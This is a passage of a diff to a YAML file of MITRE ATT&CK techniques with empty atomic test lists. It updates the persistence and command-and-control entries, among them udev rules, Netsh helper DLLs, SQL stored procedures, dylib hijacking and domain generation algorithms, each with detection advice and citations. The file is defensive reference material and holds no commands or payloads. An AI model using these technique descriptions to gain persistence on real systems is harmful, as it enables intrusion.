+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -35963,12 +36342,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -35981,6 +36359,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -36017,17 +36396,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -36073,9 +36452,65 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+    atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.007:
     technique:
@@ -36112,7 +36547,7 @@ persistence:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36136,51 +36571,11 @@ persistence:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1505.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Carlos Borges, @huntingneo, CIP
-      - Lucas da Silva Pereira, @vulcanunsec, CIP
-      - Kaspersky
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
-      type: attack-pattern
-      created: '2019-12-12T14:59:58.168Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1505.001
-        url: https://attack.mitre.org/techniques/T1505/001
-      - source_name: NetSPI Startup Stored Procedures
-        url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
-        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
-          SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
-      - source_name: Kaspersky MSSQL Aug 2019
-        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
-        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
-          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
-      - source_name: Microsoft xp_cmdshell 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
-        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
-          September 9, 2019.
-      - source_name: Microsoft CLR Integration 2017
-        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
-        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
-          Retrieved July 8, 2019.
-      - source_name: NetSPI SQL Server CLR
-        url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
-        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
-          Retrieved July 8, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-15T16:05:24.007Z'
       name: SQL Stored Procedures
       description: "Adversaries may abuse SQL stored procedures to establish persistent
         access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36203,20 +36598,57 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Carlos Borges, @huntingneo, CIP
+      - Lucas da Silva Pereira, @vulcanunsec, CIP
+      - Kaspersky
+      x_mitre_deprecated: false
       x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
         NetSPI Startup Stored Procedures) Consider enabling audit features that can
         log malicious startup activities.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+      created: '2019-12-12T14:59:58.168Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1505/001
+        external_id: T1505.001
+      - source_name: Microsoft CLR Integration 2017
+        description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+          Retrieved July 8, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+      - source_name: Microsoft xp_cmdshell 2017
+        description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+          September 9, 2019.
+        url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+      - source_name: Kaspersky MSSQL Aug 2019
+        description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+          attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+        url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+      - source_name: NetSPI Startup Stored Procedures
+        description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+          SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+          2024.'
+        url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+      - source_name: NetSPI SQL Server CLR
+        description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+          Retrieved September 12, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.004:
     technique:
@@ -36246,7 +36678,7 @@ persistence:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36270,12 +36702,10 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36359,11 +36789,10 @@ persistence:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36415,9 +36844,8 @@ persistence:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -36466,7 +36894,7 @@ persistence:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36504,14 +36932,12 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 command-and-control:
   T1205.002:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-20T19:56:18.579Z'
       name: Socket Filters
       description: |-
         Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36574,7 +37000,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.001:
     technique:
@@ -36632,97 +37057,95 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1132.001
     atomic_tests: []
   T1568.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-15T15:55:16.111Z'
+      name: Domain Generation Algorithms
+      description: |-
+        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
       x_mitre_contributors:
       - Ryan Benson, Exabeam
       - Barry Shteiman, Exabeam
       - Sylvain Gil, Exabeam
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
       type: attack-pattern
+      id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
       created: '2020-03-10T17:44:59.787Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1568.002
         url: https://attack.mitre.org/techniques/T1568/002
-      - source_name: Cybereason Dissecting DGAs
-        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
-        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
-          Eight Real World DGA Variants. Retrieved February 18, 2019.'
-      - source_name: Cisco Umbrella DGA
-        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
-        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
-          Why so effective?. Retrieved February 18, 2019.
-      - source_name: Unit 42 DGA Feb 2019
-        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
-        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
-          Generation Algorithms (DGA). Retrieved February 19, 2019.'
-      - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+        external_id: T1568.002
+      - source_name: Elastic Predicting DGA
+        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+          Networks. Retrieved April 26, 2019.
+        url: https://arxiv.org/pdf/1611.00791.pdf
+      - source_name: Talos CCleanup 2017
         description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
           Number of Machines at Risk. Retrieved March 9, 2018.'
-        source_name: Talos CCleanup 2017
-      - source_name: Akamai DGA Mitigation
-        url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
-        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
-          Domain Generation Algorithms. Retrieved February 18, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+        url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+      - source_name: Pace University Detecting DGA May 2017
+        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+          April 26, 2019.
+        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+      - source_name: FireEye POSHSPY April 2017
         description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
           WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
-        source_name: FireEye POSHSPY April 2017
+        url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
       - source_name: ESET Sednit 2017 Activity
-        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
         description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
           the Year. Retrieved February 18, 2019.'
+        url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
       - source_name: Data Driven Security DGA
-        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      - source_name: Pace University Detecting DGA May 2017
-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -36788,9 +37211,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
